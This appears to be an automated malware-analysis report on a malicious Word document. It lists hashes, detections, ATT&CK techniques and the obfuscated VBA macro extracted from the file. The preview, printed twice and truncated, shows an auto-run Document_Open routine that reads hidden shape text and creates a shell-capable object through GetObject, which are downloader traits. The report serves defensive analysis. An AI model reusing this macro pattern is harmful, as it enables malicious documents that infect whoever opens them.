Office (OLE) malware analysis — malicious · 2b1c0c05d34f81c4

MALICIOUS

Office (OLE)

134.2 KB Created: 2018-11-29 20:42:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 52f3b1365bb4809c6ab684584b481b56 SHA-1: 370796555765e5eea285a2ae103f36bdb31117fb SHA-256: 2b1c0c05d34f81c4c0ad1413a002cdd3f1d8d772f6fb32e736a7843507b477c3

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample contains a VBA macro that is automatically executed upon opening the document, as indicated by the Document_Open heuristic. The macro's obfuscated code suggests it attempts to download and execute a second-stage payload from a URL. The ClamAV detection 'Doc.Downloader.Sload-6781308-0' further supports this downloader behavior. The embedded URL, while benign according to reputation, is likely a placeholder or part of the obfuscation.

Heuristics 6

ClamAV: Doc.Downloader.Sload-6781308-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sload-6781308-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7040 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7040 bytes
SHA-256: `f16d12012d2f7635e363d826d5baa6aa621a8c6219c60d7ef841b3c547b8cd82`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zoHJoUz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next BqkJiXns = (FOFstp - Oct(azLNriKt) * JMtja - Sgn(331368044) - 181447307 + Fix(kbqOJVIz) + 1432961429 + 89689110 / 280139426 / MPnoQoc) Select Case EpSfqzVL Case 300649379 tGmVHS = CLng(332245823) RcCQVVU = Int(ztZFPm) Case 140676053 fvILXKAwD = Hex(64583075) jrqHVq = CStr(282885729 * CByte(AinTzLb)) End Select Set lowHlsq = Shapes("RwUlPHjq") On Error Resume Next uqprQulJ = (IHXSks - Oct(fSWdA) * wjdwVt - Sgn(303694568) - 190570515 + Fix(jNXTV) + 2344482859# + 53687732 / 117608939 / ZTwEHrwiz) Select Case oCzhj Case 208605210 JNRZsPowX = CLng(63435898) RXQXAaEjS = Int(YmAmwonHm) Case 211192889 naauAVhEI = Hex(38418890) iDRZpRBW = CStr(195066050 * CByte(NCkbRnvbA)) End Select On Error Resume Next qhZYsQczk = (nFwDvzwpm - Oct(GqsMjzv) * PUPYsNhdq - Sgn(270413307) - 128855088 + Fix(XALNOiQV) + 1908553249 + 199878868 / 59562398 / ofoAp) Select Case otVkjQ Case 226544584 NlVSGJ = CLng(143107923) AFifz = Int(iZOlL) Case 61731571 MZjndAaL = Hex(252489118) vfzVfA = CStr(71322589 * CByte(zkkijVK)) End Select On Error Resume Next SZbilU = (MDYAKSX - Oct(zCXqzzjt) * hEAvU - Sgn(146964750) - 50084979 + Fix(vNPLAdddd) + 2563797619# + 242499748 / 26827115 / ijsVXBtFY) Select Case mfbwjUf Case 292031861 RGOEIZwZ = CLng(296409540) WKvpBD = Int(HZwVOoX) Case 281339467 jZjzJzu = Hex(24648401) sPikwYbA = CStr(296751683 * CByte(MqqZs)) End Select QSkBzcU = "" + tZsvDYQ + wLDSr + JnqWd + NvVimpzo + lowHlsq.TextFrame.TextRange.Text + rwrjZYQF + jEpdwwnP On Error Resume Next rPYrLFauT = (jKJCUUqhm - Oct(wmjfLGoJ) * kWscTHBO - Sgn(201441410) - 86964472 + Fix(VHfCwYnf) + 1047835649 + 80761009 / 284454312 / ZQrFj) Select Case fFQQGiboi Case 279959587 TFLUGQrGd = CLng(218013151) TJtbtVSM = Int(BSWzHPF) Case 294930 bJqwjwGfj = Hex(128193366) AwGLr = CStr(252287051 * CByte(WfoGV)) End Select On Error Resume Next iziwVjptY = (AIjRf - Oct(FBpVq) * RraYj - Sgn(87342993) - 295198615 + Fix(ZwfMW) + 2999382479# + 23347277 / 269184193 / DtYhMZRN) Select Case WjGwjJEi Case 213608615 YwzcASdB = CLng(189830309) vlzQVm = Int(SSFSJLv) Case 279284846 zbPVIo = Hex(86329633) QkERXP = CStr(230004311 * CByte(otqliqc)) End Select On Error Resume Next uPiZKbSW = (oppZE - Oct(icWBhicpi) * wuUWW - Sgn(111491129) - 98857996 + Fix(WMFaJ) + 633991789 + 217301941 / 13237198 / KsAGwO) Select Case uMmmWFS Case 174258594 YMjwAmYah = CLng(21955953) lITNUfQRw = Int(uBfrcKic) Case 240124919 ufakzA = Hex(23256696) YUaZtW = CStr(280211172 * CByte(tZRroAdR)) End Select On Error Resume Next PpHAKICsF = (LonEKEFY - Oct(cVfFwCf) * BkRlFvNdm - Sgn(250148089) - 4944434 + Fix(wkGqMjloX) + 3149300569# + 128102856 / 200907557 / khbkkJwi) Select Case AIovGt Case 173740225 YSEZdrP = CLng(266004172) OQrVFQmFV = Int(msCcBT) Case 228101125 wCRcsNwX = Hex(3306283) GGpLwru = CStr(226964738 * CByte(tvrBplfo)) End Select Set JYjRlSwWl = CVar(GetObject(qCFuHRm + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + lYdZiQM)) On Error Resume Next onlNj = (AjsLBHI - Oct(NzBYAtaQ) * GDzmRhjIq - Sgn(154100708) - 106055946 + Fix(ubITTwn) + 1539430549 + 272405717 / ... (truncated)

SHA-256: f16d12012d2f7635e363d826d5baa6aa621a8c6219c60d7ef841b3c547b8cd82

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zoHJoUz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   On Error Resume Next
      BqkJiXns = (FOFstp - Oct(azLNriKt) * JMtja - Sgn(331368044) - 181447307 + Fix(kbqOJVIz) + 1432961429 + 89689110 / 280139426 / MPnoQoc)
      Select Case EpSfqzVL
         Case 300649379
            tGmVHS = CLng(332245823)
            RcCQVVU = Int(ztZFPm)
         Case 140676053
            fvILXKAwD = Hex(64583075)
            jrqHVq = CStr(282885729 * CByte(AinTzLb))
End Select
Set lowHlsq = Shapes("RwUlPHjq")
   On Error Resume Next
      uqprQulJ = (IHXSks - Oct(fSWdA) * wjdwVt - Sgn(303694568) - 190570515 + Fix(jNXTV) + 2344482859# + 53687732 / 117608939 / ZTwEHrwiz)
      Select Case oCzhj
         Case 208605210
            JNRZsPowX = CLng(63435898)
            RXQXAaEjS = Int(YmAmwonHm)
         Case 211192889
            naauAVhEI = Hex(38418890)
            iDRZpRBW = CStr(195066050 * CByte(NCkbRnvbA))
End Select
   On Error Resume Next
      qhZYsQczk = (nFwDvzwpm - Oct(GqsMjzv) * PUPYsNhdq - Sgn(270413307) - 128855088 + Fix(XALNOiQV) + 1908553249 + 199878868 / 59562398 / ofoAp)
      Select Case otVkjQ
         Case 226544584
            NlVSGJ = CLng(143107923)
            AFifz = Int(iZOlL)
         Case 61731571
            MZjndAaL = Hex(252489118)
            vfzVfA = CStr(71322589 * CByte(zkkijVK))
End Select
   On Error Resume Next
      SZbilU = (MDYAKSX - Oct(zCXqzzjt) * hEAvU - Sgn(146964750) - 50084979 + Fix(vNPLAdddd) + 2563797619# + 242499748 / 26827115 / ijsVXBtFY)
      Select Case mfbwjUf
         Case 292031861
            RGOEIZwZ = CLng(296409540)
            WKvpBD = Int(HZwVOoX)
         Case 281339467
            jZjzJzu = Hex(24648401)
            sPikwYbA = CStr(296751683 * CByte(MqqZs))
End Select
QSkBzcU = "" + tZsvDYQ + wLDSr + JnqWd + NvVimpzo + lowHlsq.TextFrame.TextRange.Text + rwrjZYQF + jEpdwwnP
   On Error Resume Next
      rPYrLFauT = (jKJCUUqhm - Oct(wmjfLGoJ) * kWscTHBO - Sgn(201441410) - 86964472 + Fix(VHfCwYnf) + 1047835649 + 80761009 / 284454312 / ZQrFj)
      Select Case fFQQGiboi
         Case 279959587
            TFLUGQrGd = CLng(218013151)
            TJtbtVSM = Int(BSWzHPF)
         Case 294930
            bJqwjwGfj = Hex(128193366)
            AwGLr = CStr(252287051 * CByte(WfoGV))
End Select
   On Error Resume Next
      iziwVjptY = (AIjRf - Oct(FBpVq) * RraYj - Sgn(87342993) - 295198615 + Fix(ZwfMW) + 2999382479# + 23347277 / 269184193 / DtYhMZRN)
      Select Case WjGwjJEi
         Case 213608615
            YwzcASdB = CLng(189830309)
            vlzQVm = Int(SSFSJLv)
         Case 279284846
            zbPVIo = Hex(86329633)
            QkERXP = CStr(230004311 * CByte(otqliqc))
End Select
   On Error Resume Next
      uPiZKbSW = (oppZE - Oct(icWBhicpi) * wuUWW - Sgn(111491129) - 98857996 + Fix(WMFaJ) + 633991789 + 217301941 / 13237198 / KsAGwO)
      Select Case uMmmWFS
         Case 174258594
            YMjwAmYah = CLng(21955953)
            lITNUfQRw = Int(uBfrcKic)
         Case 240124919
            ufakzA = Hex(23256696)
            YUaZtW = CStr(280211172 * CByte(tZRroAdR))
End Select
   On Error Resume Next
      PpHAKICsF = (LonEKEFY - Oct(cVfFwCf) * BkRlFvNdm - Sgn(250148089) - 4944434 + Fix(wkGqMjloX) + 3149300569# + 128102856 / 200907557 / khbkkJwi)
      Select Case AIovGt
         Case 173740225
            YSEZdrP = CLng(266004172)
            OQrVFQmFV = Int(msCcBT)
         Case 228101125
            wCRcsNwX = Hex(3306283)
            GGpLwru = CStr(226964738 * CByte(tvrBplfo))
End Select
Set JYjRlSwWl = CVar(GetObject(qCFuHRm + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + lYdZiQM))
   On Error Resume Next
      onlNj = (AjsLBHI - Oct(NzBYAtaQ) * GDzmRhjIq - Sgn(154100708) - 106055946 + Fix(ubITTwn) + 1539430549 + 272405717 /
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.